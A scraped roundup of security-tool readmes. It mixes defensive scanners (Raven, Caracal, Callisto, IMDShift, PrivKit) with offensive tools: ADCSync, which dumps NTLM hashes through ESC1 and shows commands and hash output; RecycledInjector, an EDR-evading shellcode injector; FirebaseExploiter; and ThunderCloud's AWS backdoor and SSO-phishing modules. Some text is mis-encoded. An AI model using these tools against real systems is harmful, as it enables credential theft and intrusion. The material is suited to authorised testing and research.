    raven report --severity high --tag injection --tag unauthenticated

    Rate Limiting

    For effective rate limiting, you should supply a GitHub token. For authenticated users, the following rate limits apply:

    • Code search - 30 queries per minute
    • Any other API - 5,000 requests per hour

    Research Knowledge Base

    Current Limitations

    • It is possible to run an external action by referencing a folder with a Dockerfile (without action.yml). Currently, this behavior isn't supported.
    • It is possible to run an external action by referencing a Docker container through the docker://... URL. Currently, this behavior isn't supported.
    • It is possible to run an action by referencing it locally. This creates complex behavior, as it may come from a different repository that was checked out previously. The current behavior is trying to find it in the existing repository.
    • We aren't modeling the entire workflow structure. If additional fields are needed, please submit a pull request according to the contribution guidelines.

    Future Research Work

    • Implementation of taint analysis. Example use case - a user can pass a pull request title (which is a controllable parameter) to an action parameter named data. That action parameter may be used in a run command: - run: echo ${{ inputs.data }}, which creates a path for code execution.
    • Expand the research for findings of harmful misuse of GITHUB_ENV. This may utilize the previous taint analysis as well.
    • Research whether actions/github-script has an interesting threat landscape. If it is, it can be modeled in the graph.

    Want more of CI/CD Security, AppSec, and ASPM? Check out Cycode

    If you liked Raven, you will probably love our Cycode platform, which offers even more enhanced capabilities for visibility, prioritization, and remediation of vulnerabilities across the software delivery process.

    If you are interested in a robust, research-driven Pipeline Security, Application Security, or ASPM solution, don't hesitate to get in touch with us or request a demo using the form at https://cycode.com/book-a-demo/.



    ADCSync - Use ESC1 To Perform A Makeshift DCSync And Dump Hashes

    By: Zion3R


    This is a tool I whipped up quickly to DCSync utilizing ESC1. It is quite slow, but otherwise an effective means of performing a makeshift DCSync attack without utilizing DRSUAPI or Volume Shadow Copy.


    This is the first version of the tool and essentially just automates the process of running Certipy against every user in a domain. It still needs a lot of work and I plan on adding more features in the future for authentication methods and automating the process of finding a vulnerable template.

    python3 adcsync.py -u clu -p theperfectsystem -ca THEGRID-KFLYNN-DC-CA -template SmartCard -target-ip 192.168.0.98 -dc-ip 192.168.0.98 -f users.json -o ntlm_dump.txt

    ___ ____ ___________
    / | / __ \/ ____/ ___/__ ______ _____
    / /| | / / / / / \__ \/ / / / __ \/ ___/
    / ___ |/ /_/ / /___ ___/ / /_/ / / / / /__
    /_/ |_/_____/\____//____/\__, /_/ /_/\___/
    /____/

    Grabbing user certs:
    100%|โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆ| 105/105 [02:18<00:00, 1.32s/it]
    THEGRID.LOCAL/shirlee.saraann::aad3b435b51404eeaad3b435b51404ee:68832255545152d843216ed7bbb2d09e:::
    THEGRID.LOCAL/rosanne.nert::aad3b435b51404eeaad3b435b51404ee:a20821df366981f7110c07c7708f7ed2:::
    THEGRID.LOCAL/edita.lauree::aad3b435b51404eeaad3b435b51404ee:b212294e06a0757547d66b78bb632d69:::
    THEGRID.LOCAL/carol.elianore::aad3b435b51404eeaad3b435b51404ee:ed4603ce5a1c86b977dc049a77d2cc6f:::
    THEGRID.LOCAL/astrid.lotte::aad3b435b51404eeaad3b435b51404ee:201789a1986f2a2894f7ac726ea12a0b:::
    THEGRID.LOCAL/louise.hedvig::aad3b435b51404eeaad3b435b51404ee:edc599314b95cf5635eb132a1cb5f04d:::
    THEGRID.LOCAL/janelle.jess::aad3b435b51404eeaad3b435b51404ee:a7a1d8ae1867bb60d23e0b88342a6fab:::
    THEGRID.LOCAL/marie-ann.kayle::aad3b435b51404eeaad3b435b51404ee:a55d86c4b2c2b2ae526a14e7e2cd259f:::
    THEGRID.LOCAL/jeanie.isa::aad3b435b51404eeaad3b435b51404ee:61f8c2bf0dc57933a578aa2bc835f2e5:::

    Introduction

    ADCSync uses the ESC1 exploit to dump NTLM hashes from user accounts in an Active Directory environment. The tool will first grab every user and domain from the BloodHound dump file passed in. Then it will use Certipy to make a request for each user and store their PFX file in the certificate directory. Finally, it will use Certipy to authenticate with the certificate and retrieve the NT hash for each user. This process is quite slow and can take a while to complete, but offers an alternative way to dump NTLM hashes.
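
    A rough sketch of the per-user loop being automated, shelling out to Certipy with the example values from the command above (the BloodHound JSON layout and the Certipy 4.x flag spellings are assumptions; versions differ):

    import json
    import subprocess

    # Hypothetical parsing: BloodHound user-export layouts vary by version.
    users = [u['Properties']['name'] for u in json.load(open('users.json'))['data']]

    for upn in users:
        # 1. Request a certificate as the victim via the ESC1-vulnerable template.
        subprocess.run(['certipy', 'req', '-u', 'clu@thegrid.local', '-p', 'theperfectsystem',
                        '-ca', 'THEGRID-KFLYNN-DC-CA', '-template', 'SmartCard',
                        '-target-ip', '192.168.0.98', '-upn', upn])
        # 2. Authenticate with the minted PFX to recover the NT hash.
        subprocess.run(['certipy', 'auth', '-pfx', f"{upn.split('@')[0]}.pfx",
                        '-dc-ip', '192.168.0.98'])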

    Installation

    git clone https://github.com/JPG0mez/adcsync.git
    cd adcsync
    pip3 install -r requirements.txt

    Usage

    To use this tool we need the following things:

    1. Valid Domain Credentials
    2. A user list from a BloodHound dump that will be passed in.
    3. A template vulnerable to ESC1 (Found with Certipy find)
    # python3 adcsync.py --help
    ___ ____ ___________
    / | / __ \/ ____/ ___/__ ______ _____
    / /| | / / / / / \__ \/ / / / __ \/ ___/
    / ___ |/ /_/ / /___ ___/ / /_/ / / / / /__
    /_/ |_/_____/\____//____/\__, /_/ /_/\___/
    /____/

    Usage: adcsync.py [OPTIONS]

    Options:
    -f, --file TEXT Input User List JSON file from Bloodhound [required]
    -o, --output TEXT NTLM Hash Output file [required]
    -ca TEXT Certificate Authority [required]
    -dc-ip TEXT IP Address of Domain Controller [required]
    -u, --user TEXT Username [required]
    -p, --password TEXT Password [required]
    -template TEXT Template Name vulnerable to ESC1 [required]
    -target-ip TEXT IP Address of the target machine [required]
    --help Show this message and exit.

    TODO

    • Support alternative authentication methods such as NTLM hashes and ccache files
    • Automatically run "certipy find" to find and grab templates vulnerable to ESC1
    • Add jitter and sleep options to avoid detection
    • Add type validation for all variables

    Acknowledgements

    • puzzlepeaches: Telling me to hurry up and write this
    • ly4k: For Certipy
    • WazeHell: For the script to set up the vulnerable AD environment used for testing


    RecycledInjector - Native Syscalls Shellcode Injector

    By: Zion3R


    (Currently) Fully Undetected same-process native/.NET assembly shellcode injector based on RecycledGate by thefLink, which is also based on HellsGate + HalosGate + TartarusGate to ensure undetectable native syscalls even if one technique fails.

    To remain stealthy and keep entropy on the final executable low, do ensure that shellcode is always loaded externally, since most AV/EDRs won't check signatures on files that are neither executables nor DLLs anyway.

    It is also important to note that the fully undetected part refers to the loading of the shellcode; the shellcode itself will still be subject to behavior monitoring, so make sure the loaded executable also makes use of defense evasion techniques (e.g., SharpKatz, which features DInvoke, instead of Mimikatz).


    Usage

    .\RecycledInjector.exe <path_to_shellcode_file>

    Proof of Concept

    This proof of concept leverages Terminator by ZeroMemoryEx to kill most security solution/agents present on the system. It is used against Microsoft Defender for Endpoint EDR.

    On the left we inject the Terminator shellcode to load the vulnerable driver and kill MDE processes, and on the right is an example of loading and executing Invoke-Mimikatz remotely from memory, which is not stopped as there is no running security solution anymore on the system.



    Caracal - Static Analyzer For Starknet Smart Contracts

    By: Zion3R


    Caracal is a static analyzer tool over the SIERRA representation for Starknet smart contracts.

    Features

    • Detectors to detect vulnerable Cairo code
    • Printers to report information
    • Taint analysis
    • Data flow analysis framework
    • Easy to run in Scarb projects

    Installation

    Precompiled binaries

    Precompiled binaries are available on our releases page. If you are using the Cairo 1.x.x compiler, use the v0.1.x binary; if you are using the Cairo 2.x.x compiler, use v0.2.x.

    Building from source

    You need the Rust compiler and Cargo. Building from git:

    cargo install --git https://github.com/crytic/caracal --profile release --force

    Building from a local copy:

    git clone https://github.com/crytic/caracal
    cd caracal
    cargo install --path . --profile release --force

    Usage

    List detectors:

    caracal detectors

    List printers:

    caracal printers

    Standalone

    To use Caracal with a standalone Cairo file, you need to pass the path to the corelib library, either with the --corelib CLI option or by setting the CORELIB_PATH environment variable. Run detectors:

    caracal detect path/file/to/analyze --corelib path/to/corelib/src

    Run printers:

    caracal print path/file/to/analyze --printer printer_to_use --corelib path/to/corelib/src

    Scarb

    If you have a project that uses Scarb you need to add the following in Scarb.toml:

    [[target.starknet-contract]]
    sierra = true

    [cairo]
    sierra-replace-ids = true

    Then pass the path to the directory where Scarb.toml resides. Run detectors:

    caracal detect path/to/dir

    Run printers:

    caracal print path/to/dir --printer printer_to_use

    Detectors

    Num | Detector | What it Detects | Impact | Confidence | Cairo
    1 | controlled-library-call | Library calls with a user-controlled class hash | High | Medium | 1 & 2
    2 | unchecked-l1-handler-from | Detect L1 handlers without a from address check | High | Medium | 1 & 2
    3 | felt252-overflow | Detect user-controlled operations with the felt252 type, which is not overflow safe | High | Medium | 1 & 2
    4 | reentrancy | Detect when a storage variable is read before an external call and written after | Medium | Medium | 1 & 2
    5 | read-only-reentrancy | Detect when a view function reads a storage variable written after an external call | Medium | Medium | 1 & 2
    6 | unused-events | Events defined but not emitted | Medium | Medium | 1 & 2
    7 | unused-return | Unused return values | Medium | Medium | 1 & 2
    8 | unenforced-view | Function has view decorator but modifies state | Medium | Medium | 1
    9 | unused-arguments | Unused arguments | Low | Medium | 1 & 2
    10 | reentrancy-benign | Detect when a storage variable is written after an external call but not read before | Low | Medium | 1 & 2
    11 | reentrancy-events | Detect when an event is emitted after an external call, leading to out-of-order events | Low | Medium | 1 & 2
    12 | dead-code | Private functions never used | Low | Medium | 1 & 2

    The Cairo column represents the compiler version(s) for which the detector is valid.

    Printers

    • cfg: Export the CFG of each function to a .dot file
    • callgraph: Export function call graph to a .dot file

    How to contribute

    Check the wiki for contribution guidelines.

    Limitations

    • Inlined functions are not handled correctly.
    • Since it works over the SIERRA representation, it is not possible to report where an error is in the source code; we can only report SIERRA instructions/what is available in a SIERRA program.


    Callisto - An Intelligent Binary Vulnerability Analysis Tool

    By: Zion3R


    Callisto is an intelligent automated binary vulnerability analysis tool. Its purpose is to autonomously decompile a provided binary and iterate through the pseudo code output looking for potential security vulnerabilities in that pseudo-C code. Ghidra's headless decompiler is what drives the binary decompilation and analysis portion. The pseudo code analysis is initially performed by the Semgrep SAST tool and then transferred to GPT-3.5-Turbo for validation of Semgrep's findings, as well as potential identification of additional vulnerabilities.


    This tool's intended purpose is to assist with binary analysis and zero-day vulnerability discovery. The output aims to help the researcher identify potential areas of interest or vulnerable components in the binary, which can be followed up with dynamic testing for validation and exploitation. It certainly won't catch everything, but the double validation from Semgrep to GPT-3.5 aims to reduce false positives and allow a deeper analysis of the program.

    For those looking to leverage the tool just as a quick headless decompiler, the output.c file created will contain all the extracted pseudo code from the binary. This can be plugged into your own SAST tools or manually analyzed, as sketched below.
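
    A minimal sketch of that follow-up step, running your own Semgrep scan over the extracted pseudo code (the ruleset path is illustrative; point it at whatever C rules you use):

    import subprocess

    # Scan the decompiled pseudo code with a local Semgrep C ruleset and
    # save the findings as JSON for later triage.
    subprocess.run([
        'semgrep', '--config', 'rules/c/',   # ruleset path is illustrative
        '--json', '--output', 'semgrep_findings.json',
        'output.c',
    ])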

    I owe Marco Ivaldi @0xdea a huge thanks for his publicly released custom Semgrep C rules as well as his idea to automate vulnerability discovery using semgrep and pseudo code output from decompilers. You can read more about his research here: Automating binary vulnerability discovery with Ghidra and Semgrep

    Requirements:

    • If you want to use the GPT-3.5-Turbo feature, you must create an API token on OpenAI and save it to the config.txt file in this folder
    • Ghidra
    • Semgrep - pip install semgrep
    • requirements.txt - pip install -r requirements.txt
    • Ensure the correct path to your Ghidra directory is set in the config.txt file

    To Run: python callisto.py -b <path_to_binary> -ai -o <path_to_output_file>

    • -ai => enable OpenAI GPT-3.5-Turbo Analysis. Will require placing a valid OpenAI API key in the config.txt file
    • -o => define an output file, if you want to save the output
    • -ai and -o are optional parameters
    • -all will run all functions through OpenAI Analysis, regardless of any Semgrep findings. This flag requires the prerequisite -ai flag
    • Ex. python callisto.py -b vulnProgram.exe -ai -o results.txt
    • Ex. (Running all functions through AI Analysis):
      python callisto.py -b vulnProgram.exe -ai -all -o results.txt




    IMDShift - Automates Migration Process Of Workloads To IMDSv2 To Avoid SSRF Attacks

    By: Zion3R


    AWS workloads that rely on the metadata endpoint are vulnerable to Server-Side Request Forgery (SSRF) attacks. IMDShift automates the migration of all workloads to IMDSv2, which implements enhanced security measures to protect against these attacks.
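
    For a sense of what the migration does per resource, here is a sketch of the underlying call for a single EC2 instance using boto3 (the instance ID and region are placeholders):

    import boto3

    ec2 = boto3.client('ec2', region_name='ap-south-1')  # region is a placeholder

    # Enforce IMDSv2 on one instance: require session tokens and raise the
    # hop limit so containers can still reach the metadata endpoint.
    ec2.modify_instance_metadata_options(
        InstanceId='i-0123456789abcdef0',   # placeholder instance ID
        HttpTokens='required',              # IMDSv2 only
        HttpPutResponseHopLimit=2,
        HttpEndpoint='enabled',
    )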


    Features

    • Detection of AWS workloads that rely on the metadata endpoint amongst various services which includes - EC2, ECS, EKS, Lightsail, AutoScaling Groups, Sagemaker Notebooks, Beanstalk (in progress)
    • Simple and intuitive command-line interface for easy usage
    • Automated migration of all workloads to IMDSv2
    • Standalone hop limit update for compatible resources
    • Standalone metadata endpoint enable operation for compatible resources
    • Detailed logging of migration process
    • Identify resources that are using IMDSv1, using the MetadataNoToken CloudWatch metric across specified regions
    • Built-in Service Control Policy (SCP) recommendations

    IMDShift vs. Metabadger

    Metabadger is an older tool that was used to facilitate the migration of AWS EC2 workloads to IMDSv2.

    IMDShift makes several improvements on Metabadger's capabilities:

    • IMDShift allows migration of individual services rather than blindly migrating all EC2 instances. For example, the user can choose to migrate only EKS workloads. Some services, such as Lightsail, do not fall under the EC2 umbrella; IMDShift has the capability to migrate such resources as well.
    • IMDShift allows standalone enabling of the metadata endpoint for resources where it is currently disabled, without having to perform migration on the remaining resources
    • IMDShift allows standalone updates of the response hop limit for resources where the metadata endpoint is enabled, without having to perform migration on the remaining resources
    • IMDShift offers not only the option to include specific regions, but also to skip specified regions
    • IMDShift not only allows the use of AWS profiles, but can also assume roles to work
    • IMDShift helps with post-migration activities by suggesting various Service Control Policies (SCPs) to implement.

    Installation

    Production Installation

    git clone https://github.com/ayushpriya10/imdshift.git
    cd imdshift/
    python3 -m pip install .

    Development Installation

    git clone https://github.com/ayushpriya10/imdshift.git
    cd imdshift/
    python3 -m pip install -e .

    Usage

    Options:
    --services TEXT This flag specifies which services to scan for
    IMDSv1 usage, from [EC2, Sagemaker, ASG (Auto Scaling
    Groups), Lightsail, ECS, EKS, Beanstalk].
    Format: "--services EC2,Sagemaker,ASG"
    --include-regions TEXT This flag specifies regions explicitly to
    include scan for IMDSv1 usage. Format: "--
    include-regions ap-south-1,ap-southeast-1"
    --exclude-regions TEXT This flag specifies regions to exclude from the
    scan explicitly. Format: "--exclude-regions ap-
    south-1,ap-southeast-1"
    --migrate This boolean flag enables IMDShift to perform
    the migration, defaults to "False". Format: "--
    migrate"
    --update-hop-limit INTEGER This flag specifies if the hop limit should be
    updated and with what value. It is recommended
    to set the hop limit to "2" to enable containers
    to be able to work with the IMDS endpoint. If
    this flag is not passed, hop limit is not
    updated during migration. Format: "--update-hop-
    limit 3"
    --enable-imds This boolean flag enables IMDShift to enable the
    metadata endpoint for resources that have it
    disabled and then perform the migration,
    defaults to "False". Format: "--enable-imds"
    --profile TEXT This allows you to use any profile from your
    ~/.aws/credentials file. Format: "--profile
    prod-env"
    --role-arn TEXT This flag lets you assume a role via AWS STS.
    Format: "--role-arn
    arn:aws:sts::111111111:role/John"
    --print-scps This boolean flag prints Service Control
    Policies (SCPs) that can be used to control IMDS
    usage, like deny access for credentials fetched
    from IMDSv2 or deny creation of resources with
    IMDSv1, defaults to "False". Format: "--print-
    scps"
    --check-imds-usage This boolean flag launches a scan to identify
    how many instances are using IMDSv1 in specified
    regions, during the last 30 days, by using the
    "MetadataNoToken" CloudWatch metric, defaults to
    "False". Format: "--check-imds-usage"
    --help Show this message and exit.


    PrivKit - Simple Beacon Object File That Detects Privilege Escalation Vulnerabilities Caused By Misconfigurations On Windows OS

    By: Zion3R


    PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.


    PrivKit detects the following misconfigurations:

    • Checks for Unquoted Service Paths
    • Checks for Autologon Registry Keys
    • Checks for Always Install Elevated Registry Keys (see the sketch after this list)
    • Checks for Modifiable Autoruns
    • Checks for Hijackable Paths
    • Enumerates Credentials From Credential Manager
    • Looks for current Token Privileges
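
    As an illustration of the Always Install Elevated check flagged above, here is the equivalent registry logic sketched in Python (PrivKit itself implements these checks as a C beacon object file):

    import winreg

    # The machine is exploitable only if AlwaysInstallElevated is 1 in
    # BOTH the machine and user hives.
    def always_install_elevated(hive) -> bool:
        try:
            key = winreg.OpenKey(hive, r'SOFTWARE\Policies\Microsoft\Windows\Installer')
            value, _ = winreg.QueryValueEx(key, 'AlwaysInstallElevated')
            return value == 1
        except OSError:
            return False

    vulnerable = (always_install_elevated(winreg.HKEY_LOCAL_MACHINE)
                  and always_install_elevated(winreg.HKEY_CURRENT_USER))
    print('AlwaysInstallElevated:', 'VULNERABLE' if vulnerable else 'not set')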

    Usage

    [03/20 00:51:06] beacon> privcheck
    [03/20 00:51:06] [*] Priv Esc Check Bof by @merterpreter
    [03/20 00:51:06] [*] Checking For Unquoted Service Paths..
    [03/20 00:51:06] [*] Checking For Autologon Registry Keys..
    [03/20 00:51:06] [*] Checking For Always Install Elevated Registry Keys..
    [03/20 00:51:06] [*] Checking For Modifiable Autoruns..
    [03/20 00:51:06] [*] Checking For Hijackable Paths..
    [03/20 00:51:06] [*] Enumerating Credentials From Credential Manager..
    [03/20 00:51:06] [*] Checking For Token Privileges..
    [03/20 00:51:06] [+] host called home, sent: 10485 bytes
    [03/20 00:51:06] [+] received output:
    Unquoted Service Path Check Result: Vulnerable service path found: c:\program files (x86)\grasssoft\macro expert\MacroService.exe

    Simply load the CNA file and type "privcheck".

    If you want to compile it yourself, you can use:

    make all

    or

    x86_64-w64-mingw32-gcc -c cfile.c -o ofile.o

    If you want to check for just one misconfiguration, you can use the corresponding object file with "inline-execute", for example:

    inline-execute /path/tokenprivileges.o

    Acknowledgement

    Mr.Un1K0d3r - Offensive Coding Portal
    https://mr.un1k0d3r.world/portal/

    Outflank - C2-Tool-Collection
    https://github.com/outflanknl/C2-Tool-Collection

    dtmsecurity - Beacon Object File (BOF) Creation Helper
    https://github.com/dtmsecurity/bof_helper

    Microsoft :)
    https://learn.microsoft.com/en-us/windows/win32/api/

    HsTechDocs by HelpSystems(Fortra)
    https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/beacon-object-files_how-to-develop.htm



    FirebaseExploiter - Vulnerability Discovery Tool That Discovers Firebase Database Which Are Open And Can Be Exploitable


    FirebaseExploiter is a vulnerability discovery tool that discovers Firebase databases which are open and exploitable. Primarily built for mass hunting bug bounties and for penetration testing.
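
    The core check is simple; a minimal sketch in Python of what "open" means here (the project name is a placeholder):

    import requests

    # An open Firebase Realtime Database answers an unauthenticated
    # read of /.json; a locked-down one refuses it.
    url = 'https://victim-project.firebaseio.com/.json'   # placeholder project
    r = requests.get(url, timeout=10)
    if r.status_code == 200:
        print('[+] Open database:', url)
    else:
        print('[-] Not readable:', r.status_code)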

    Features

    • Mass vulnerability scanning from list of hosts
    • Custom JSON data in exploit.json to upload during exploit
    • Custom URI path for exploit

    Usage

    This will display help for the CLI tool, listing all the arguments it supports.

    Installation

    FirebaseExploiter was built using go1.19. Make sure you use the latest version of Go to install it successfully. Run the following command to install the latest version:

    go install -v github.com/securebinary/firebaseExploiter@latest

    Running FirebaseExploiter

    To scan a specific domain to check for Insecure Firebase DB.

    To exploit a Firebase DB to write your own JSON document in it.

    Create your own exploit.json file in proper JSON format to exploit vulnerable Firebase DBs.

    Checking the exploited URL to verify the vulnerability.

    Adding custom path for exploiting Firebase DBs.

    Mass scanning for Insecure Firebase Databases from list of target hosts.

    Exploiting vulnerable Firebase DBs from the list of target hosts.

    License

    FirebaseExploiter is made with love by the SecureBinary team. Any tweaks / community contributions are welcome.


    ThunderCloud - Cloud Exploit Framework




    Usage

    python3 tc.py -h

    _______ _ _ _____ _ _
    |__ __| | | | / ____| | | |
    | | | |__ _ _ _ __ __| | ___ _ __| | | | ___ _ _ __| |
    | | | '_ \| | | | '_ \ / _` |/ _ \ '__| | | |/ _ \| | | |/ _` |
    | | | | | | |_| | | | | (_| | __/ | | |____| | (_) | |_| | (_| |
    \_/ |_| |_|\__,_|_| |_|\__,_|\___|_| \_____|_|\___/ \__,_|\__,_|


    usage: tc.py [-h] [-ce COGNITO_ENDPOINT] [-reg REGION] [-accid AWS_ACCOUNT_ID] [-aws_key AWS_ACCESS_KEY] [-aws_secret AWS_SECRET_KEY] [-bdrole BACKDOOR_ROLE] [-sso SSO_URL] [-enum_roles ENUMERATE_ROLES] [-s3 S3_BUCKET_NAME]
    [-conn_string CONNECTION_STRING] [-blob BLOB] [-shared_access_key SHARED_ACCESS_KEY]

    Attack modules of cloud AWS

    optional arguments:
    -h, --help show this help message and exit
    -ce COGNITO_ENDPOINT, --cognito_endpoint COGNITO_ENDPOINT
    to verify if cognito endpoint is vulnerable and to extract credentials
    -reg REGION, --region REGION
    AWS region of the resource
    -accid AWS_ACCOUNT_ID, --aws_account_id AWS_ACCOUNT_ID
    AWS account of the victim
    -aws_key AWS_ACCESS_KEY, --aws_access_key AWS_ACCESS_KEY
    AWS access keys of the victim account
    -aws_secret AWS_SECRET_KEY, --aws_secret_key AWS_SECRET_KEY
    AWS secret key of the victim account
    -bdrole BACKDOOR_ROLE, --backdoor_role BACKDOOR_ROLE
    Name of the backdoor role in victim role
    -sso SSO_URL, --sso_url SSO_URL
    AWS SSO URL to phish for AWS credentials
    -enum_roles ENUMERATE_ROLES, --enumerate_roles ENUMERATE_ROLES
    To enumerate and assume account roles in victim AWS roles
    -s3 S3_BUCKET_NAME, --s3_bucket_name S3_BUCKET_NAME
    Execute upload attack on S3 bucket
    -conn_string CONNECTION_STRING, --connection_string CONNECTION_STRING
    Azure Shared Access key for reading servicebus/queues/blobs etc
    -blob BLOB, --blob BLOB
    Azure blob enumeration
    -shared_access_key SHARED_ACCESS_KEY, --shared_access_key SHARED_ACCESS_KEY
    Azure shared key

    Requirements

    * python 3
    * pip
    * git

    Installation

    - get project `git clone https://github.com/Rnalter/ThunderCloud.git && cd ThunderCloud/`
    - install virtualenv (https://virtualenv.pypa.io/en/latest/) `pip install virtualenv`
    - create a Python 3.6 local environment `virtualenv -p python3.6 venv`
    - activate the virtual environment `source venv/bin/activate`
    - install project dependencies `pip install -r requirements.txt`
    - run the tool via `python tc.py --help`

    Running ThunderCloud

    Examples

    python3 tc.py -sso <sso_url> --region <region>
    python3 tc.py -ce <cognito_endpoint> --region <region>


    โŒ